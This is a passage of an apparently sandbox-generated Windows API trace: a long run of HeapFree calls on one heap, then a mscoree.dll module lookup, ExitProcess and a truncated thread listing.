dwFlags=0x0, lpMem=0x327d150 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d178 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d1a0 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d1c8 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271dd8 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271e10 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d1f0 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d218 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d240 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d268 | out: hHeap=0x620000) returned 1 [0145.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d290 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d2b8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d2e0 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d308 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271e48 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271e80 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d330 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d358 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d380 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d3a8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d3d0 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d3f8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d420 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d448 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271eb8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271ef0 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d470 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d498 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d4c0 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d4e8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327d510 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3291ec8 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3264ba0 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3263d60 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225d80 | out: hHeap=0x620000) returned 1 [0145.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6741f0 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fca8 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283a90 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3222fd0 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32836a0 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32836e8 | out: hHeap=0x620000) returned 1 [0145.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3289ec8 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6737c0 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32754b0 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63e738 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31f78d8 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b3c78 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b4500 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b4d88 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b5610 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b080 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b33f0 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32927a0 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a6778 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bb1f8 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a821e8 | out: hHeap=0x620000) returned 1 [0145.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32968a8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3296090 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3295878 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70d498 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3299130 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329a190 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329a9c8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329b200 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329ba38 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329cab0 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329c270 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3299958 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329db40 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329f430 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a00b0 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329d2f8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329e388 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a0d30 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a1578 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a1dc0 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a25f8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a2e30 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a3668 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a3e90 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a46b8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a4ee0 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a5718 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a5f50 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a6fb8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b77f8 | out: hHeap=0x620000) returned 1 [0145.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b8478 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a7840 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a80c8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x329ebb0 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b90f8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b9940 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b6fa0 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ba188 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ba9c0 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a8950 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a91d8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32a9a60 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bba28 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bca98 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32aa2e8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32be378 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32beff8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32aab70 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ab3f8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bd2d0 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a80048 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a80890 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bc260 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32bdb08 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a810d8 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32abc80 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ac508 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32acd90 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ad618 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32ae728 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32adea0 | out: hHeap=0x620000) returned 1 [0145.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a83290 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a83f10 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32aefb0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32af838 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b0948 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a82a28 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b11d0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b1a58 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b22e0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b00c0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b2b68 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a81910 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3264388 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff5b8 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32653f8 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f218 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32298c0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228fc8 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x327eee8 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aad098 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aad920 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aae1a8 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaea30 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b150 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa5b28 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aab838 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aac050 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aac868 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa63b0 | out: hHeap=0x620000) returned 1 [0145.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa6c38 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa74c0 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa7d48 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225fd8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a84ba8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a85430 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a85cb8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a86540 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a86dc8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3294038 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a87650 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a87ed8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3294880 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a94b90 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a953f8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a88760 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a88fe8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a95c60 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a964a8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a89870 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8a0f8 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8a980 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8b208 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8ba90 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8c318 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8cba0 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8d428 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8dcb0 | out: hHeap=0x620000) returned 1 [0145.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8e538 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a96cf0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a97558 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8edc0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8f648 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a8fed0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a97dc0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a98608 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a90758 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a90fe0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a91868 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a920f0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a92978 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a93200 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a93a88 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a98e68 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a996f0 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa8e50 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa96b8 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a99f78 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9a800 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9b088 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa9f20 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9b910 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9c198 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9ca20 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9d2a8 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9db30 | out: hHeap=0x620000) returned 1 [0145.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9e3b8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9ec40 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9f4c8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9a9fd50 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa05d8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaa768 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaafd0 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa0e60 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa16e8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa1f70 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa27f8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa3080 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa3908 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa4190 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa4a18 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aa52a0 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32989e8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32981d0 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b0e8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3292fc0 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32b5e98 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32979b8 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32970c0 | out: hHeap=0x620000) returned 1 [0145.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6415f8 | out: hHeap=0x620000) returned 1 [0145.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x640710 | out: hHeap=0x620000) returned 1 [0145.171] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ecec | out: phModule=0x18ecec) returned 0 [0145.171] ExitProcess (uExitCode=0x0) [0145.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x324b690 | out: hHeap=0x620000) returned 1 [0145.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63f300 | out: hHeap=0x620000) returned 1 Thread: id = 76 os_tid = 0x998 Thread: id = 77 os_tid = 0x9b0 Thread: id = 78 os_tid = 0xae0 Thread: id = 79 os_tid = 0xaf0 Thread: id = 80 os_tid = 0xb00 Thread: id = 81 os_tid = 0xb10 Thread: id = 82 os_tid 